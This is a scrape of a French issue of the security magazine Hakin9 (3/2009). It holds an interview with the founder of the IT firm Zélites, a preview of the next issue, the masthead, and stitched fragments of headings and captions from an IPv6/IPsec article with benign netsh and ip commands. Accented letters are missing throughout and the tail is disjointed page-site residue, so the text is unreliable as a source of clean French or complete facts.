Pour commencer, est-ce que vous pourriez vous prsenter nos lecteurs ? Je suis une jeune entrepreneuse passionne, autodidacte, sportive, autonome et indpendante. J'ai cr Zlites, une socit de prestations informatiques aux Mans (Sarthe, FR) en motivant et consolidant les comptences que j'ai pu rencontrer dans mes diffrentes expriences. Je me suis plong dans l'informatique en pluchant tour tour Windows 95 puis Linux ( partir de 1997) alors que j'tais encore au collge. Malgr mon BAC Sciences et Techniques de Laboratoire passer, je n'ai pas lch mes premiers ordinateurs. J'ai ensuite appris matriser les systmes Unix avec FreeBSD, OpenBSD, NetBSD et Sun Solaris. J'ai toujours t curieuse de faire quelque chose qui n'est pas prvu par les gens ou les systmes tout en cherchant comprendre comment ils fonctionnent concrtement. En 2004, j'ai fait un bref passage l'EPITECH o j'ai pu formaliser mes premires connaissances en matire de programmation systme surtout orient rseau ou noyau. Par la suite, jai consolid ces acquis en programmation C, que je considre comme lune des bases pour pouvoir faire de la scurit.
80 HAKIN9 3/2009
Ltude de protocoles rseaux, le dveloppement noyau et systme, ainsi que le reverse engineering ont t et sont toujours mes sujets de recherche favoris. J'ai fait un premier stage en entreprise avec pour objectif la recherche et mise en place d'une politique de scurit Wi-Fi, base sur des solutions opensource. En 2005, jai ralise un stage dans une SSII o j'ai travaill sur l'intgration d'une solution de firewall et d'anti-spam sur base de *BSD. J'ai pass mes trois dernires annes travailler comme freelance en administration systme et comme consultante en scurit. Mes capacits en termes d'analyse, d'adaptation et de ractivit font que l'on me considre un peu comme le joker disponible toute situation. Pourriez- vous nous prsenter brivement vos services et nous dire quel rle joue aujourdhui Zlites ? Nous avons quatre familles d'offre : Le matriel informatique, l'infrastructure rseau, le conseil informatique et le dveloppement de solutions web. Nous proposons des solutions de scurit informatique dans toutes ces familles, sauf ct matriel.
L'Infrastructure rseau : Nous sommes l'architecte et le ralisateur des infrastructures rseau de nos clients. Nous concevons, maintenons et faisons voluer l'ensemble des quipements relis entre eux pour changer et partager de manire scurise les informations. Nous faisons en sorte que nos clients puissent bnficier de leur outils quels que soient leurs besoins fonctionnels et gographiques. Le Conseil informatique : Nous offrons un haut niveau de prestation de conseil informatique, que nos clients aient dj ou non, un service informatique. Les missions de conseil informatique que nous ralisons chez les entreprises conjuguent notre capacit importante comprendre leurs mtiers avec leurs spcificits et notre matrise des technologies informatiques, pour les mettre au service dune stratgie dentreprise. Comme nous touchons un large spectre de connaissances techniques, notre vision est libre de toute influence pour les solutions prconises.
Le Dveloppement de solutions web :

Nous dveloppons des solutions web valeur ajoute.
INTERVIEW ANNE-GALLE LUNOT

Nous partons souvent d'un dveloppement web qui pourrait paratre classique pour y ajouter trs rapidement des solutions d'change avec l'extrieur : Extranet, solutions de facturation en ligne, change de donnes, solutions de gestion de projet, CRM, etc Ces systmes sont souvent une porte d'entre des donnes propres l'entreprise. Elles sont exclusivement hberges sur des serveurs dont nous assumons la scurit du systme d'exploitation au code des solutions. Les Audits de scurit. Nous ralisons des audits aussi bien sur site pour analyser un rseau local, qu' distance pour apprhender la visibilit externe de lentreprise. Ces oprations ncessitent des interventions manuelles : nous ne nous arrtons pas l'utilisation d'outils automatiques, car chaque infrastructure est diffrente et dynamique. En matire de scurit, quels sont les points forts de vos solutions ? Notre cur de cible se trouve dans des petites et moyennes entreprises de 20 200 personnes qui ont tendance tre abandonnes par les grosses pointures du mtier. Nous faisons en sorte d'incorporer les facteurs de scurit ds la conception ou l'volution de leur systme d'information quand nous prenons en main l'infogrance ou la maintenance de leur systme. Ces entreprises sont rarement demandeuses de solutions ou d'audits de scurit informatique; nous avons donc une dmarche la fois didactique et souvent invisible. Mme si le sujet de la scurit informatique est dans tous les mdias, rares sont les PME qui font le lien avec leur propre systme. Elles ne ralisent pas le lien entre la scurisation de leur systme et la fiabilit. Le retour sur investissement est lun des avantages de faire appel nos services : au del de l'aspect purement scuritaire, nous faisons en sorte de fiabiliser les outils. Quand ces outils sont disponibles 24 heures sur 24 et sans interruption de service, les intervenants peuvent travailler sereinement et donc tirer profit du bon fonctionnement de ces derniers. Les gains sont visibles par le taux d'utilisation des outils, la chute des cots de maintenance, la rduction du stress des utilisateurs. Le plus important pour nos clients, cest que nous faisons du sur-mesure, que ce soit pour la mise en place de solutions ou bien des audits, lintervention manuelle et intellectuelle est toujours privilgie. Quels sont vos avantages concurrentiels ? Adaptabilit aux secteurs d'activit de nos clients, Ractivit, Taille humaine, Sur mesure, Larges connaissances techniques.
Quelles sont vos offres orientes vers les entreprises et les particuliers ? Nos offres sont uniquement ddies aux entreprises. Quels conseils pourriez-vous donner nos lecteurs qui hsitent devant le choix de service informatique ? Ils ont raison d'hsiter : il ne faut pas aller au plus simple. Les offres packages sont souvent trompeuses et pauvres en intelligence technique. Il faut viter de s'adresser ses proches. Le monde de l'informatique vu par le nophyte peut tre compar au monde mdical : En effet, lorsque vous entrez dans un hpital, toutes les personnes qui portent une blouse blanche ne sont pas tous des mdecins ou des professeurs ! Il ne faut pas hsiter vrifier les rfrences de son prestataire. En terminant, pourriez-vous citer quelques uns de vos clients de renomme internationale qui font confiance vos services ? SeisQuaRe, anciennement ERM.S-GROUP (services paraptroliers), Promaritime International (transport maritime). Notre socit est encore trop jeune pour avoir fait des missions de scurit dans des groupes de renomme internationale. http://www.zelites.org
3/2009 HAKIN9 81
ENle JUILLET Dans prochain numro

DOSSIER
Dans notre dossier nous vous prsenterons les possibilits de modifier le logiciel de votre IPHONE 3G. Voila la confrontation de technologie amovible avec les spcialistes Hakin9!
Toute l'actualit du prochain numro sur le site www.hakin9.org/fr.
DITORIAL
Dans cette rubrique cèst Yves Le Provost, consultant en scurit informatique travaillant pour le cabinet HSC (Herv Schauer Consultants) qui vous prsentera làrticle sur les attaques par injections SQL.
SUR LE CD
Comme toujours dans chaque numro nous vous proposons Hakin9 live avec la distribution Backtrack 3. Applications commerciales en versions compltes et des programmes en excluvit, pour la scurit, la protection et la stabilit de votre systme. Des tutoriels vido pratiques afin de mieux comprendre les mthodes offensives.
PRATIQUE
Cette rubrique vous permettra de connatre une mthode dàttaque et dàppliquer les moyens de dfense mettre en place.
EN BREF
Làctualit du monde de la scurit informatique et des systmes dìnformation. Les nouvelles failles, les intrusions web et les nouvelles applications.
TECHNIQUE
Cette fois-ci nous vous prsenterons un article Lanti-mascarade qui parle dùne technique peu connue et non implmente sur les scanners de ports (y compris nmap). Cette astuce permet de dnombrer le nombre de machines prsentes derriere un routeur qui redirige certains ports vers ces machines.
DATA RECOVERY
Dans cette rubrique vous allez suivre les risques lis aux donnes, de la cl USB au serveur, les risques de pertes, mais aussi de vol de donnes, les moyens de protectios lis ces priphriques.
Vous souhaitez collaborer a la rdaction des articles? N`hsitez pas nous contacter! FR@HAKIN9.ORG Ce numro sera disponible en Juillet/Aot La rdaction se rserve le droit de modifier le contenu de la revue.
Le bimestriel hakin9 est publi par Software-Wydawnictwo Sp. z o.o. Prsident de Software-Wydawnictwo Sp. z o.o. : Pawe Marciniak Rdactrice en chef : Margot Kompiel malgorzata.kompiel@hakin9.org Fabrication : Marta Kurpiewska marta.kurpiewska@software.com.pl DTP : Marcin Zikowski Graphics & Design Studio http://www.gdstudio.pl Couverture : Agnieszka Marchocka Couverture CD : Przemyslaw Banasiewicz Publicit : publicite@software.com.pl Abonnement : software@emdnl.nl Diffusion : Katarzyna Winiarz katarzyna.winiarz@software.com.pl Dpt lgal : parution ISSN : 1731-7037 Distribution : MLP Parc dactivits de Chesnes, 55 bd de la Noire BP 59 F - 38291 SAINT-QUENTIN-FALLAVIER CEDEX (c) 2009 Software-Wydawnictwo, tous les droits rservs
Bta-testeurs : Didier Sicchia, Pierre Louvet, Anthony Marchetti, Rgis Senet, Paul Amar, Julien Smyczynski Les personnes intresses par la coopration sont invites nous contacter : fr@hakin9.org Prparation du CD : Rafal Kwany Imprimerie, photogravure : 101 Studio, Firma Tgi Ekonomiczna 30/36, 93-426 d Imprim en Pologne Adresse de correspondance : Software-Wydawnictwo Sp. z o.o. Bokserska 1, 02-682 Varsovie, Pologne Tl. +48 22 427 32 87, Fax. +48 22 244 24 59 www.hakin9.org Abonnement (France mtropolitaine, DOM/ TOM) : 1 an (soit 6 numros) 35 La rdaction fait tout son possible pour sassurer que les logiciels sont jour, elle dcline toute responsabilit pour leur utilisation.
Elle ne fournit pas de support technique li linstallation ou lutilisation des logiciels enregistrs sur le CD-ROM. Tous les logos et marques dposs sont la proprit de leurs propritaires respectifs. Le CD-ROM joint au magazine a t test avec AntiVirenKit de la socit G Data Software Sp. z o.o. AVERTISSEMENT Les techniques prsentes dans les articles ne peuvent tre utilises quau sein des rseaux internes. La rdaction du magazine nest pas responsable de lutilisation incorrecte des techniques prsentes. Lutilisation des techniques prsentes peut provoquer la perte des donnes !
82
HAKIN9 5/2008
La rdaction se rserve le droit de modifier le contenu de la revue

Hakin9 03 2009 FR

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Hakin9 03 2009 FR

Uploaded by

Copyright:

Available Formats

DITORIAL

Bonne lecture ! Magorzata Kompiel Rdaction de Hakin9

POUR LES DBUTANTS

JULIEN RAEIS Les attaques hors-ligne

mission compromettante. Orage dans un verre d'eau ?

Dans le prochain numro

TOUTES LES CARTES EN MAIN

VENGEANCE, MALBOUFFE ET SABOTAGE

UN VISAGE FAMILIER EST BIEN PLUS FACILE POUR TROMPER

PAS DE CIRCONSTANCES ATTNUANTES POUR ACID

FOSDEM 2009, CHRISTOPHE ALLADOUM, CONSULTANT SCURIT (HSC)

MICROSOFT PRDIT, SUGGRE ET CONSTATE

VIDO TOR HACKING

Mcanismes IPv6 avancs

CET ARTICLE EXPLIQUE...

CE QU'IL FAUT SAVOIR...

Listing 1. Structure gnrale du fichier setkey.conf

Listing 2. Configuration SPD sur 3ffe::1

Listing 3. Configuration SAD sur 3ffe::1

Listing 4. Configuration SPD et SAD sur 3ffe::2

Protection ESP et Algorithmes

ESP (Encryption Security Payload)

- Version - Payload Lenght - Next Header - Source Address - Destination Address

Figure 2. AH en mode transport

- Version - Payload Lenght - Next Header - Source Address - Destination Address

Figure 3. AH en mode tunnel

Topologies de mises en uvre

Option Headers chiffr Autentifi

Figure 5. ESP en mode transport

Figure 6. ESP en mode tunnel

Figure 7. Topologies ESP

IKE (Internet Key Exchange)

Mobilit de Machines : MIPv6

(Home Address, Care-of Address)

Correspondant Rseau Mre

Section protge Section non protge Agent Mre Tunel ESP

Figure 8. Communication MIPv6 Basique sans optimisation

Mobilit de Machines : MIP6

Payload Len RESERVED SPI Sequence Number ICV Padding

8 bits 16 bits 32 bits 32 bits Variable Selon Variable

Return Routability procdure

Figure 10. Commande netsh show sous Windows XP

Mobilit de Rseaux : NEMO

TFC Padding Padding

Pad Length Next Header

Variable Selon lalgorithme usit

A lissue de ces diffrentes tapes, le mobile calcule une cl note Kbm :

Activation de la pile IPv6 & Configuration des Adresses

Pratique & Mise En uvre

Figure 11. Ping6 www.google.fr

Figure 12. Dchiffrement IPsec avec Wireshark

Accs Web en IPv6

Table 5. Les commandes essentielles IPv6 sous Windows Commande Netsh

Permet dajouter des adresses IPv6 aux interfaces

netsh interface ipv6 show routes [[level=]{normal | verbose}] [[store=]{active | persistent}]

Permet la rinitialisation des adresses IPv6

Table 6. Commandes principales pour la configuration dIPv6 sous linux Commande ip

Cache des voisins (NDP Cache)

ip -6 route show [dev <priphrique>]

ip -6 neigh show [dev <priphrique>]

Mise en uvre mode routeur

Commandes et outils principaux

pour diagnostiquer la connectivit rseau. (Exemple : ping6